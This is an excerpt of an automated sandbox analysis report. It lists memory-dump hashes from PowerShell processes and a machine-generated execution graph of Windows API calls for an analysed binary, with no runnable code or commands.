                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.2203249433.00007FF8476B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8476B0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff8476b0000_powershell.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d76482f3ad11c7fade7164bbd528e5ce5a5637e8e6b161252fd77ec710de2f1b
                                                                                                                                                                                                                                          • Instruction ID: 524045109d47532a7ed7aed441c273e243ed72fb6d62a32c53461fcac33a3457
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d76482f3ad11c7fade7164bbd528e5ce5a5637e8e6b161252fd77ec710de2f1b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80F05431A0D5558FDF54EB2CE4819A87BE0FF5536071500B6E61DC7157DB25EC44C790
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000039.00000002.2300597861.00007FF8476A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8476A0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_57_2_7ff8476a0000_powershell.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 3f99abcf2bcc6fbc609e11ff8396d1f747a676b219fcf96f99e0303720c4b073
                                                                                                                                                                                                                                          • Instruction ID: 3d556393d3ec6358741a450b4724fa91573abb4f091657ccee0ea5f2c103284d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3f99abcf2bcc6fbc609e11ff8396d1f747a676b219fcf96f99e0303720c4b073
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E220821E0DB898FEB9AA73868556BA7FF2EF47650B0801FBD08DC7193D9189C06C751
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000039.00000002.2299456713.00007FF8475D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8475D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_57_2_7ff8475d0000_powershell.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 5f8aa7a287e216274991f232bb734b50fd60e928f09d8a80a10a01a4c78d5adc
                                                                                                                                                                                                                                          • Instruction ID: b2d282ad353d92da47cfc8fb1543656dc83e0ab7d8e23668627cf9aaf5583620
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5f8aa7a287e216274991f232bb734b50fd60e928f09d8a80a10a01a4c78d5adc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 00B1D231E0D6868FEB15EB6CD8951EDBFB0EF46350B1541BBC489CB293DA256806CB80
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000039.00000002.2300597861.00007FF8476A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8476A0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_57_2_7ff8476a0000_powershell.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 5afc4825cf9a0afde016c85360d7c8e6d752f6a41b45a7210652fdc93bf9c4a3
                                                                                                                                                                                                                                          • Instruction ID: d76fa03f8749500a1212d3c58a972424bce51fdc8c48926f21a2f6bc38aa5fca
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5afc4825cf9a0afde016c85360d7c8e6d752f6a41b45a7210652fdc93bf9c4a3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B631F432E0DB5A8FEBA1E66C68056FE77D2EF567A4B1805B7C10DC3093E919AC058391
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000039.00000002.2299456713.00007FF8475D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8475D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_57_2_7ff8475d0000_powershell.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                                          • Instruction ID: ec7303ac25b6f2ba240a62a78cda6aba8bd6885d5843fd76fa0bf63e93a1e51e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE01677111CB0C8FD744EF0CE451AA5B7E0FB95364F10056DE58AC3695D636E882CB45

                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                          Execution Coverage:7.9%
                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                          Signature Coverage:0.5%
                                                                                                                                                                                                                                          Total number of Nodes:1203
                                                                                                                                                                                                                                          Total number of Limit Nodes:37
                                                                                                                                                                                                                                          execution_graph 38219 7ff713957a5b 38220 7ff713957a60 38219->38220 38222 7ff713957af7 38220->38222 38252 7ff713969be0 38220->38252 38223 7ff713957bda 38222->38223 38355 7ff713971e1c GetFileTime 38222->38355 38263 7ff71395b540 38223->38263 38228 7ff71395b540 147 API calls 38230 7ff713957c9c 38228->38230 38229 7ff713957c3e 38229->38228 38251 7ff713957f89 38230->38251 38357 7ff713976378 38230->38357 38232 7ff713957cd7 38233 7ff713976378 4 API calls 38232->38233 38235 7ff713957cf3 38233->38235 38234 7ff713957de1 38241 7ff713957e4e 38234->38241 38368 7ff7139898dc 38234->38368 38235->38234 38237 7ff713957d38 38235->38237 38238 7ff713957d59 38235->38238 38361 7ff7139aa444 38237->38361 38239 7ff7139aa444 new 4 API calls 38238->38239 38245 7ff713957d42 std::bad_alloc::bad_alloc 38239->38245 38374 7ff713951204 48 API calls 38241->38374 38243 7ff713957eb3 38246 7ff713957edb 38243->38246 38375 7ff713989680 38243->38375 38245->38234 38367 7ff7139aba34 RtlPcToFileHeader RaiseException 38245->38367 38381 7ff713976424 8 API calls _handle_error 38246->38381 38249 7ff713957f56 38250 7ff71395b540 147 API calls 38249->38250 38250->38251 38382 7ff71396901c CryptAcquireContextW 38252->38382 38256 7ff713969c2a 38392 7ff713999ce4 38256->38392 38260 7ff713969c5b memcpy_s 38402 7ff7139aa610 38260->38402 38267 7ff71395b55f setbuf 38263->38267 38264 7ff71395b5a1 38265 7ff71395b5d8 38264->38265 38266 7ff71395b5b8 38264->38266 38541 7ff713988c1c 38265->38541 38427 7ff71395aba0 38266->38427 38267->38264 38423 7ff71395a4d0 38267->38423 38270 7ff7139aa610 _handle_error 8 API calls 38272 7ff713957bf8 38270->38272 38271 7ff71395b67f 38273 7ff71395bc91 38271->38273 38275 7ff71395bbae 38271->38275 38276 7ff71395b6a5 38271->38276 38272->38229 38356 7ff7139a9b98 216 API calls 3 library calls 38272->38356 38274 7ff71395b5d3 38273->38274 38279 7ff713972574 126 API calls 38273->38279 38274->38270 38277 7ff713988d00 48 API calls 38275->38277 38276->38274 38286 7ff71395b6b5 38276->38286 38305 7ff71395b79f 38276->38305 38280 7ff71395bc5c 38277->38280 38279->38274 38610 7ff713988d38 48 API calls 38280->38610 38284 7ff71395bc69 38611 7ff713988d38 48 API calls 38284->38611 38286->38274 38575 7ff713988d00 38286->38575 38288 7ff71395bc76 38612 7ff713988d38 48 API calls 38288->38612 38290 7ff71395bc84 38613 7ff713988d88 48 API calls 38290->38613 38295 7ff71395b726 38579 7ff713988d38 48 API calls 38295->38579 38297 7ff71395b733 38298 7ff71395b749 38297->38298 38580 7ff713988d88 48 API calls 38297->38580 38300 7ff71395b75c 38298->38300 38581 7ff713988d38 48 API calls 38298->38581 38302 7ff71395b779 38300->38302 38304 7ff713988d00 48 API calls 38300->38304 38582 7ff713988f94 38302->38582 38304->38300 38306 7ff71395b8e5 38305->38306 38592 7ff71395c3c8 CharLowerW CharUpperW 38305->38592 38593 7ff71399d840 WideCharToMultiByte 38306->38593 38310 7ff71395b9a1 38312 7ff713988d00 48 API calls 38310->38312 38313 7ff71395b9c4 38312->38313 38596 7ff713988d38 48 API calls 38313->38596 38315 7ff71395b910 38315->38310 38595 7ff71395945c 55 API calls _handle_error 38315->38595 38316 7ff71395b9d1 38597 7ff713988d38 48 API calls 38316->38597 38318 7ff71395b9de 38598 7ff713988d88 48 API calls 38318->38598 38320 7ff71395b9eb 38599 7ff713988d88 48 API calls 38320->38599 38322 7ff71395ba0b 38323 7ff713988d00 48 API calls 38322->38323 38324 7ff71395ba27 38323->38324 38600 7ff713988d88 48 API calls 38324->38600 38326 7ff71395ba37 38327 7ff71395ba49 38326->38327 38601 7ff71399bc48 15 API calls 38326->38601 38602 7ff713988d88 48 API calls 38327->38602 38330 7ff71395ba59 38331 7ff713988d00 48 API calls 38330->38331 38332 7ff71395ba66 38331->38332 38333 7ff713988d00 48 API calls 38332->38333 38334 7ff71395ba78 38333->38334 38603 7ff713988d38 48 API calls 38334->38603 38336 7ff71395ba85 38604 7ff713988d88 48 API calls 38336->38604 38338 7ff71395ba92 38346 7ff71395bacd 38338->38346 38605 7ff713988d88 48 API calls 38338->38605 38341 7ff71395bab2 38606 7ff713988d88 48 API calls 38341->38606 38344 7ff71395bb33 38345 7ff71395bb53 38344->38345 38350 7ff713988e3c 48 API calls 38344->38350 38351 7ff71395bb6e 38345->38351 38352 7ff713988e3c 48 API calls 38345->38352 38607 7ff713988e3c 38346->38607 38347 7ff713988d00 48 API calls 38348 7ff71395bb09 38347->38348 38348->38344 38349 7ff713988e3c 48 API calls 38348->38349 38349->38344 38350->38345 38353 7ff713988f94 126 API calls 38351->38353 38352->38351 38353->38274 38355->38223 38356->38229 38358 7ff7139763a0 38357->38358 38359 7ff713976396 38357->38359 38358->38232 38360 7ff7139aa444 new 4 API calls 38359->38360 38360->38358 38364 7ff7139aa44f 38361->38364 38362 7ff7139aa47a 38362->38245 38363 7ff7139b36c0 new 2 API calls 38363->38364 38364->38362 38364->38363 38804 7ff7139ab314 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38364->38804 38805 7ff7139ab2f4 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38364->38805 38367->38234 38369 7ff713989926 38368->38369 38370 7ff71398993c 38368->38370 38371 7ff7139690b8 75 API calls 38369->38371 38372 7ff7139690b8 75 API calls 38370->38372 38373 7ff713989934 38371->38373 38372->38373 38373->38241 38374->38243 38379 7ff7139896a4 38375->38379 38376 7ff7139897d7 38377 7ff713972574 126 API calls 38377->38379 38379->38376 38379->38377 38380 7ff7139a9b98 216 API calls 38379->38380 38806 7ff713976498 72 API calls new 38379->38806 38380->38379 38381->38249 38383 7ff71396907e 38382->38383 38384 7ff713969057 CryptGenRandom CryptReleaseContext 38382->38384 38386 7ff713969c9c 11 API calls 38383->38386 38384->38383 38385 7ff713969089 38384->38385 38387 7ff713969c9c 38385->38387 38386->38385 38411 7ff71399c0a8 GetSystemTime SystemTimeToFileTime 38387->38411 38389 7ff713969cc5 38414 7ff7139b2d74 38389->38414 38393 7ff713969c49 38392->38393 38394 7ff713999d15 memcpy_s 38392->38394 38396 7ff713999b70 38393->38396 38394->38393 38417 7ff713999d74 38394->38417 38397 7ff713999bd9 memcpy_s 38396->38397 38401 7ff713999bad memcpy_s 38396->38401 38398 7ff713999d74 8 API calls 38397->38398 38399 7ff713999c07 38398->38399 38399->38260 38400 7ff713999d74 8 API calls 38400->38397 38401->38397 38401->38400 38403 7ff7139aa61a 38402->38403 38404 7ff713969c86 38403->38404 38405 7ff7139aa6a0 IsProcessorFeaturePresent 38403->38405 38404->38222 38406 7ff7139aa6b7 38405->38406 38421 7ff7139aa894 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 38406->38421 38408 7ff7139aa6ca 38422 7ff7139aa66c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 38408->38422 38412 7ff7139aa610 _handle_error 8 API calls 38411->38412 38413 7ff71399c0f1 38412->38413 38413->38389 38415 7ff713969cd7 38414->38415 38416 7ff7139b2d8b QueryPerformanceCounter 38414->38416 38415->38256 38416->38415 38418 7ff713999dbc 38417->38418 38419 7ff7139aa610 _handle_error 8 API calls 38418->38419 38420 7ff713999f40 38419->38420 38420->38394 38421->38408 38424 7ff71395a4ea 38423->38424 38425 7ff71395a4ee 38424->38425 38614 7ff713972440 38424->38614 38425->38264 38428 7ff71395abbf setbuf 38427->38428 38429 7ff713988c1c 48 API calls 38428->38429 38433 7ff71395abf5 38429->38433 38430 7ff71395aca7 38431 7ff71395b4af 38430->38431 38432 7ff71395acbf 38430->38432 38434 7ff71395b4ff 38431->38434 38438 7ff713972574 126 API calls 38431->38438 38435 7ff71395b35c 38432->38435 38436 7ff71395acc8 38432->38436 38433->38430 38433->38431 38437 7ff713969be0 14 API calls 38433->38437 38643 7ff7139872c0 38434->38643 38440 7ff713988eec 48 API calls 38435->38440 38443 7ff71395acdd 38436->38443 38446 7ff71395ad60 38436->38446 38455 7ff71395aea7 38436->38455 38441 7ff71395ac34 38437->38441 38438->38434 38442 7ff71395b395 38440->38442 38444 7ff7139690b8 75 API calls 38441->38444 38445 7ff71395b3ad 38442->38445 38642 7ff713959e2c 48 API calls 38442->38642 38447 7ff71395ad68 38443->38447 38448 7ff71395ace6 38443->38448 38449 7ff71395ac8f 38444->38449 38453 7ff713988eec 48 API calls 38445->38453 38452 7ff7139aa610 _handle_error 8 API calls 38446->38452 38451 7ff713988eec 48 API calls 38447->38451 38448->38446 38624 7ff713988eec 38448->38624 38449->38430 38460 7ff713972574 126 API calls 38449->38460 38456 7ff71395ad9c 38451->38456 38457 7ff71395b52b 38452->38457 38458 7ff71395b3d4 38453->38458 38483 7ff71395afda 38455->38483 38632 7ff713959b64 48 API calls _handle_error 38455->38632 38461 7ff713988eec 48 API calls 38456->38461 38457->38274 38462 7ff71395b3e6 38458->38462 38463 7ff713988eec 48 API calls 38458->38463 38460->38430 38465 7ff71395ada9 38461->38465 38466 7ff713988eec 48 API calls 38462->38466 38463->38462 38464 7ff713988eec 48 API calls 38467 7ff71395ad31 38464->38467 38468 7ff713988eec 48 API calls 38465->38468 38469 7ff71395b451 38466->38469 38470 7ff713988eec 48 API calls 38467->38470 38471 7ff71395adb5 38468->38471 38473 7ff71395b471 38469->38473 38479 7ff713988eec 48 API calls 38469->38479 38474 7ff71395ad46 38470->38474 38472 7ff713988eec 48 API calls 38471->38472 38475 7ff71395adc2 38472->38475 38477 7ff71395b486 38473->38477 38480 7ff713988e3c 48 API calls 38473->38480 38476 7ff713988f94 126 API calls 38474->38476 38478 7ff713988d00 48 API calls 38475->38478 38476->38446 38481 7ff713988f94 126 API calls 38477->38481 38482 7ff71395adcf 38478->38482 38479->38473 38480->38477 38481->38446 38484 7ff7139690b8 75 API calls 38482->38484 38494 7ff71395aff2 38483->38494 38633 7ff713959d98 48 API calls 38483->38633 38486 7ff71395ae22 38484->38486 38488 7ff713988e3c 48 API calls 38486->38488 38489 7ff71395ae33 38488->38489 38490 7ff713988e3c 48 API calls 38489->38490 38493 7ff71395ae48 38490->38493 38491 7ff71395b02b 38492 7ff71395b0af 38491->38492 38635 7ff71395a2c8 48 API calls 38491->38635 38496 7ff71395b0c8 38492->38496 38636 7ff71395a1a0 48 API calls 2 library calls 38492->38636 38501 7ff713999ce4 8 API calls 38493->38501 38494->38491 38634 7ff713959efc 48 API calls _handle_error 38494->38634 38499 7ff71395b0e2 38496->38499 38637 7ff71395a350 48 API calls _handle_error 38496->38637 38502 7ff713988eec 48 API calls 38499->38502 38503 7ff71395ae60 38501->38503 38504 7ff71395b0fc 38502->38504 38505 7ff713999b70 8 API calls 38503->38505 38506 7ff713988eec 48 API calls 38504->38506 38507 7ff71395ae6d 38505->38507 38509 7ff71395b109 38506->38509 38508 7ff713988e3c 48 API calls 38507->38508 38510 7ff71395ae80 38508->38510 38511 7ff71395b11f 38509->38511 38513 7ff713988eec 48 API calls 38509->38513 38512 7ff713988f94 126 API calls 38510->38512 38628 7ff713988e94 38511->38628 38512->38446 38513->38511 38516 7ff713988eec 48 API calls 38517 7ff71395b147 38516->38517 38518 7ff713988e94 48 API calls 38517->38518 38519 7ff71395b15f 38518->38519 38520 7ff713988eec 48 API calls 38519->38520 38523 7ff71395b16c 38520->38523 38521 7ff71395b18a 38522 7ff71395b1a9 38521->38522 38639 7ff713988d88 48 API calls 38521->38639 38525 7ff713988e94 48 API calls 38522->38525 38523->38521 38638 7ff713988d88 48 API calls 38523->38638 38527 7ff71395b1bc 38525->38527 38528 7ff713988eec 48 API calls 38527->38528 38529 7ff71395b1d6 38528->38529 38531 7ff71395b1e9 38529->38531 38640 7ff71395c3c8 CharLowerW CharUpperW 38529->38640 38531->38531 38532 7ff713988eec 48 API calls 38531->38532 38533 7ff71395b21f 38532->38533 38534 7ff713988e3c 48 API calls 38533->38534 38535 7ff71395b230 38534->38535 38536 7ff71395b247 38535->38536 38537 7ff713988e3c 48 API calls 38535->38537 38538 7ff713988f94 126 API calls 38536->38538 38537->38536 38539 7ff71395b278 38538->38539 38539->38446 38641 7ff7139870d8 4 API calls 2 library calls 38539->38641 38664 7ff713988f28 38541->38664 38544 7ff7139690b8 38545 7ff713969123 38544->38545 38557 7ff7139691a9 38544->38557 38545->38557 38682 7ff713997e74 38545->38682 38547 7ff7139aa610 _handle_error 8 API calls 38548 7ff71395b66e 38547->38548 38560 7ff713972574 38548->38560 38550 7ff71399d840 WideCharToMultiByte 38551 7ff713969157 38550->38551 38552 7ff71396916a 38551->38552 38553 7ff7139691c4 38551->38553 38551->38557 38555 7ff7139691ab 38552->38555 38556 7ff71396916f 38552->38556 38701 7ff713969338 12 API calls _handle_error 38553->38701 38700 7ff71396951c 71 API calls _handle_error 38555->38700 38556->38557 38686 7ff7139698b0 38556->38686 38557->38547 38561 7ff71397259e 38560->38561 38562 7ff7139725a5 38560->38562 38561->38271 38563 7ff7139725ab GetStdHandle 38562->38563 38570 7ff7139725ba 38562->38570 38563->38570 38564 7ff713972619 WriteFile 38564->38570 38565 7ff7139725cf WriteFile 38566 7ff71397260b 38565->38566 38565->38570 38566->38565 38566->38570 38567 7ff713972658 GetLastError 38567->38570 38569 7ff713972684 SetLastError 38569->38570 38570->38561 38570->38564 38570->38565 38570->38567 38573 7ff713972721 38570->38573 38798 7ff713973144 9 API calls 2 library calls 38570->38798 38799 7ff71396cf34 10 API calls 38570->38799 38800 7ff71396c95c 126 API calls 38570->38800 38801 7ff71396cf14 10 API calls 38573->38801 38576 7ff71395161c 48 API calls 38575->38576 38577 7ff71395b719 38576->38577 38578 7ff713988d38 48 API calls 38577->38578 38578->38295 38579->38297 38580->38298 38581->38300 38583 7ff713989131 38582->38583 38585 7ff713988fcf 38582->38585 38583->38274 38584 7ff71398905d 38586 7ff7139890e0 38584->38586 38588 7ff71395161c 48 API calls 38584->38588 38585->38584 38802 7ff71396ca6c 48 API calls 3 library calls 38585->38802 38586->38583 38587 7ff713972574 126 API calls 38586->38587 38587->38583 38588->38586 38590 7ff71398904c 38803 7ff71396ca40 61 API calls _CxxThrowException 38590->38803 38592->38306 38594 7ff71395b8f8 CharToOemA 38593->38594 38594->38315 38595->38310 38596->38316 38597->38318 38598->38320 38599->38322 38600->38326 38601->38327 38602->38330 38603->38336 38604->38338 38605->38341 38606->38346 38608 7ff71395161c 48 API calls 38607->38608 38609 7ff71395baf2 38608->38609 38609->38344 38609->38347 38609->38348 38610->38284 38611->38288 38612->38290 38613->38273 38615 7ff71397246a SetFilePointer 38614->38615 38618 7ff713972454 38614->38618 38616 7ff7139724ad 38615->38616 38617 7ff71397248d GetLastError 38615->38617 38616->38425 38617->38616 38619 7ff713972497 38617->38619 38618->38616 38622 7ff71396cd00 10 API calls 38618->38622 38619->38616 38623 7ff71396cd00 10 API calls 38619->38623 38626 7ff713988efc 38624->38626 38625 7ff713988d00 48 API calls 38625->38626 38626->38625 38627 7ff71395ad24 38626->38627 38627->38464 38629 7ff713988eac 38628->38629 38630 7ff713988d00 48 API calls 38629->38630 38631 7ff71395b137 38629->38631 38630->38629 38631->38516 38632->38483 38633->38494 38634->38491 38635->38492 38636->38496 38637->38499 38638->38521 38639->38522 38640->38531 38641->38446 38642->38445 38644 7ff7139872dd 38643->38644 38645 7ff713987304 38644->38645 38647 7ff7139aa480 38644->38647 38645->38446 38648 7ff7139aa444 38647->38648 38649 7ff7139aa47a 38648->38649 38653 7ff7139b36c0 38648->38653 38656 7ff7139ab314 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38648->38656 38657 7ff7139ab2f4 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38648->38657 38649->38645 38658 7ff7139b3700 38653->38658 38663 7ff7139b6938 EnterCriticalSection 38658->38663 38660 7ff7139b370d 38661 7ff7139b6998 abort LeaveCriticalSection 38660->38661 38662 7ff7139b36d2 38661->38662 38662->38648 38667 7ff71395161c 38664->38667 38666 7ff71395b601 38666->38271 38666->38273 38666->38544 38668 7ff713951640 38667->38668 38677 7ff7139516aa memcpy_s 38667->38677 38669 7ff71395166d 38668->38669 38678 7ff71396ca6c 48 API calls 3 library calls 38668->38678 38670 7ff7139516d4 38669->38670 38672 7ff71395168e 38669->38672 38670->38677 38681 7ff71396cb64 8 API calls 38670->38681 38672->38677 38680 7ff71396cb64 8 API calls 38672->38680 38673 7ff713951661 38679 7ff71396cb64 8 API calls 38673->38679 38677->38666 38678->38673 38683 7ff713969143 38682->38683 38684 7ff713997e95 38682->38684 38683->38550 38702 7ff713997ec8 38684->38702 38690 7ff713969920 38686->38690 38699 7ff713969b45 38686->38699 38687 7ff7139aa610 _handle_error 8 API calls 38688 7ff713969b61 38687->38688 38688->38557 38691 7ff71396996d 38690->38691 38692 7ff713969b75 38690->38692 38734 7ff713997da8 38690->38734 38691->38691 38741 7ff71396a0f4 38691->38741 38693 7ff713997f24 68 API calls 38692->38693 38696 7ff713969acb 38693->38696 38695 7ff7139699d0 38695->38695 38757 7ff713997f24 38695->38757 38696->38699 38771 7ff713994ea8 8 API calls _handle_error 38696->38771 38699->38687 38700->38557 38701->38557 38703 7ff713997efa memcpy_s 38702->38703 38708 7ff713997fb5 38703->38708 38716 7ff71399b3f0 38703->38716 38706 7ff71399805c GetCurrentProcessId 38707 7ff713998034 38706->38707 38707->38683 38708->38706 38710 7ff713997ff1 38708->38710 38709 7ff713997f7e GetProcAddressForCaller GetProcAddress 38709->38708 38710->38707 38725 7ff71396ca6c 48 API calls 3 library calls 38710->38725 38712 7ff71399801f 38726 7ff71396cda4 10 API calls 2 library calls 38712->38726 38714 7ff713998027 38727 7ff71396ca40 61 API calls _CxxThrowException 38714->38727 38728 7ff7139aa5a0 38716->38728 38719 7ff71399b428 38723 7ff7139aa610 _handle_error 8 API calls 38719->38723 38720 7ff71399b42c 38730 7ff7139848bc 38720->38730 38724 7ff713997f72 38723->38724 38724->38708 38724->38709 38725->38712 38726->38714 38727->38707 38729 7ff71399b3fc GetSystemDirectoryW 38728->38729 38729->38719 38729->38720 38731 7ff7139848cb setbuf 38730->38731 38732 7ff7139aa610 _handle_error 8 API calls 38731->38732 38733 7ff71398493a LoadLibraryExW 38732->38733 38733->38719 38735 7ff713997e74 68 API calls 38734->38735 38736 7ff713997ddc 38735->38736 38737 7ff713997e74 68 API calls 38736->38737 38738 7ff713997def 38737->38738 38739 7ff7139aa610 _handle_error 8 API calls 38738->38739 38740 7ff713997e43 38739->38740 38740->38690 38744 7ff71396a15c memcpy_s 38741->38744 38742 7ff71396a358 38794 7ff7139aa774 8 API calls __report_securityfailure 38742->38794 38744->38742 38745 7ff71396a352 38744->38745 38746 7ff71396a34d 38744->38746 38747 7ff71396a192 38744->38747 38793 7ff7139aa774 8 API calls __report_securityfailure 38745->38793 38792 7ff7139aa774 8 API calls __report_securityfailure 38746->38792 38772 7ff713969dd8 38747->38772 38749 7ff71396a35e 38752 7ff71396a1d9 38753 7ff713969dd8 8 API calls 38752->38753 38754 7ff71396a2f1 38752->38754 38753->38752 38755 7ff7139aa610 _handle_error 8 API calls 38754->38755 38756 7ff71396a33b 38755->38756 38756->38695 38758 7ff713997f5e 38757->38758 38763 7ff713997fb5 38757->38763 38759 7ff71399b3f0 10 API calls 38758->38759 38758->38763 38760 7ff713997f72 38759->38760 38760->38763 38764 7ff713997f7e GetProcAddressForCaller GetProcAddress 38760->38764 38761 7ff71399805c GetCurrentProcessId 38762 7ff713998034 38761->38762 38762->38696 38763->38761 38765 7ff713997ff1 38763->38765 38764->38763 38765->38762 38795 7ff71396ca6c 48 API calls 3 library calls 38765->38795 38767 7ff71399801f 38796 7ff71396cda4 10 API calls 2 library calls 38767->38796 38769 7ff713998027 38797 7ff71396ca40 61 API calls _CxxThrowException 38769->38797 38771->38699 38773 7ff713969e46 38772->38773 38779 7ff713969e6e memcpy_s 38772->38779 38774 7ff713999ce4 8 API calls 38773->38774 38775 7ff713969e5e 38774->38775 38776 7ff713999b70 8 API calls 38775->38776 38776->38779 38777 7ff713969e85 38778 7ff713999ce4 8 API calls 38777->38778 38780 7ff713969f97 38778->38780 38779->38777 38781 7ff713999ce4 8 API calls 38779->38781 38782 7ff713999b70 8 API calls 38780->38782 38781->38777 38783 7ff713969fa8 memcpy_s 38782->38783 38784 7ff713969fb4 38783->38784 38786 7ff713999ce4 8 API calls 38783->38786 38785 7ff713999ce4 8 API calls 38784->38785 38787 7ff71396a0bb 38785->38787 38786->38784 38788 7ff713999b70 8 API calls 38787->38788 38789 7ff71396a0c9 38788->38789 38790 7ff7139aa610 _handle_error 8 API calls 38789->38790 38791 7ff71396a0d8 38790->38791 38791->38752 38792->38745 38793->38742 38794->38749 38795->38767 38796->38769 38797->38762 38798->38569 38800->38570 38802->38590 38803->38584 38806->38379 38807 7ff71399bb70 38810 7ff71399bb80 38807->38810 38819 7ff71399bae8 38810->38819 38812 7ff71399bb79 38813 7ff71399bb97 38813->38812 38824 7ff713961690 38813->38824 38815 7ff71399bbd5 LeaveCriticalSection 38817 7ff71399bae8 67 API calls 38815->38817 38816 7ff71399bbc8 SetEvent 38816->38815 38817->38813 38828 7ff71399b974 WaitForSingleObject 38819->38828 38822 7ff71399bb12 38822->38813 38823 7ff71399bb16 EnterCriticalSection LeaveCriticalSection 38823->38822 38825 7ff7139616c2 EnterCriticalSection 38824->38825 38827 7ff7139616a4 38824->38827 38825->38815 38825->38816 38827->38825 38836 7ff713961180 38827->38836 38829 7ff71399b986 GetLastError 38828->38829 38830 7ff71399b9b7 38828->38830 38834 7ff71396ca6c 48 API calls 3 library calls 38829->38834 38830->38822 38830->38823 38832 7ff71399b9a6 38835 7ff71396ca40 61 API calls _CxxThrowException 38832->38835 38834->38832 38835->38830 38837 7ff7139611ab 38836->38837 38843 7ff7139611b0 38836->38843 38846 7ff7139617c8 216 API calls 2 library calls 38837->38846 38838 7ff71396166a 38838->38827 38840 7ff713986fe8 216 API calls 38840->38843 38841 7ff713986e90 216 API calls 38841->38843 38842 7ff713986d38 216 API calls 38842->38843 38843->38838 38843->38840 38843->38841 38843->38842 38844 7ff713961080 48 API calls 38843->38844 38847 7ff7139617c8 216 API calls 2 library calls 38843->38847 38844->38843 38846->38843 38847->38843 38848 7ff7139b2450 38855 7ff7139b3734 38848->38855 38850 7ff7139b2455 38851 7ff7139b6998 abort LeaveCriticalSection 38850->38851 38852 7ff7139b2460 38851->38852 38853 7ff7139b246c 38852->38853 38854 7ff7139b2488 11 API calls 38852->38854 38854->38853 38860 7ff7139b5630 35 API calls 4 library calls 38855->38860 38858 7ff7139b373f 38861 7ff7139b4a1c 35 API calls abort 38858->38861 38860->38858 38862 7ff71399a924 38864 7ff71399a949 snprintf 38862->38864 38863 7ff71399a97f CompareStringA 38864->38863 38865 7ff7139b9c74 38866 7ff7139b9c7c 38865->38866 38867 7ff7139b9cbb 38866->38867 38868 7ff7139b9cac 38866->38868 38869 7ff7139b9cc5 38867->38869 38887 7ff7139bce08 32 API calls 2 library calls 38867->38887 38886 7ff7139b4f3c 15 API calls memcpy_s 38868->38886 38874 7ff7139b4b8c 38869->38874 38873 7ff7139b9cb1 memcpy_s 38875 7ff7139b4ba1 38874->38875 38876 7ff7139b4bab 38874->38876 38888 7ff7139b4ab4 38875->38888 38878 7ff7139b4bb0 38876->38878 38884 7ff7139b4bb7 __vcrt_getptd_noexit 38876->38884 38895 7ff7139b4a74 38878->38895 38879 7ff7139b4bf6 38901 7ff7139b4f3c 15 API calls memcpy_s 38879->38901 38881 7ff7139b4be0 RtlReAllocateHeap 38883 7ff7139b4ba9 38881->38883 38881->38884 38883->38873 38884->38879 38884->38881 38885 7ff7139b36c0 new 2 API 